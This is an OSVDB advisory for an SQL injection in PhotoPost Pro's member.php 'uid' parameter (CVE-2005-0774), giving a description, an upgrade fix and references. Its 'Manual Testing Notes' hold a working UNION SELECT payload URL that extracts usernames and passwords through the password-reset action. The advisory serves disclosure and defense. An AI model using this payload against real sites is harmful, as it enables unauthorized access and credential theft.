PhotoPost Pro member.php uid Parameter SQL Injection

2005-03-11T05:40:19
ID OSVDB:14679
Type osvdb
Reporter Igor Franchuk(sprog@online.ru)
Modified 2005-03-11T05:40:19

Description

Vulnerability Description

PhotoPost Pro contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'uid' parameter in the 'member.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 5.01 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PhotoPost Pro contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'uid' parameter in the 'member.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@host.zone",%20concat(username,"%20",%20password)%20from%20users

References:

Vendor URL: http://www.photopost.com/ Secunia Advisory ID:14576 Related OSVDB ID: 14680 Related OSVDB ID: 14681 Related OSVDB ID: 14682 Related OSVDB ID: 14683 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0200.html ISS X-Force ID: 19675 CVE-2005-0774 Bugtraq ID: 12779